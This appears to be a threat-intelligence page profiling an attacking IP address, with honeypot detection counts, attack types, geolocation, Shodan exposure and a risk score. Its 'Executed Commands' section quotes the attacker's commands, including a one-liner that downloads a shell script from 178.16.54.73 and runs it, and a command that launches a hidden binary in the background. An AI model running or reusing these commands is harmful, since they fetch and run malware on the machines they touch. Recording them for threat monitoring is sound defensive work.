TROYANOSYVIRUS
Active Threat β€’ CRITICAL

45.205.1.110

First Detection3/17/2026
Last Activity4/5/2026
ISPVpsvault.host Ltd
🎯
13,903
Total Attacks
πŸ”Œ
13
Ports
πŸ“‘
5
Attack Types
🦠
1
Malware

Geolocation

Country
πŸ‡ΊπŸ‡Έ United States
City
Unknown
ASN
AS215925
ISP
Vpsvault.host Ltd

Attack Types

ssh_telnet_honeypot
yaml_exploit_honeypot
redis_honeypot
adb_honeypot
tcp_trap

Attacked Ports

223000555556785679568063797860788080008728900010250

Associated Malware

Executed Commands

$cd /tmp || cd /data/local/tmp || cd /var/run; rm -f .s; (wget http://178.16.54.73:80/sifFBrHc.sh -O .s 2>/dev/null || curl -sS -o .s http://178.16.54.73:80/sifFBrHc.sh || /bin/busybox wget http://178.16.54.73:80/sifFBrHc.sh -O .s); chmod 777 .s; sh .s3x
$uname -m2x
$echo ALIVE2x
$uname -m 2>/dev/null || getprop ro.product.cpu.abi2x
$chmod 755 /data/local/tmp/.p 2>/dev/null; (/data/local/tmp/.p >/dev/null 2>&1 &)1x

Shodan InternetDB ExposureShodan

InternetDB data, not real-time

Ports
22
CPEs
cpe:/a:openbsd:openssh:8.9p1cpe:/o:canonical:ubuntu_linux

Risk Assessment

85
/100
LowMediumHighCritical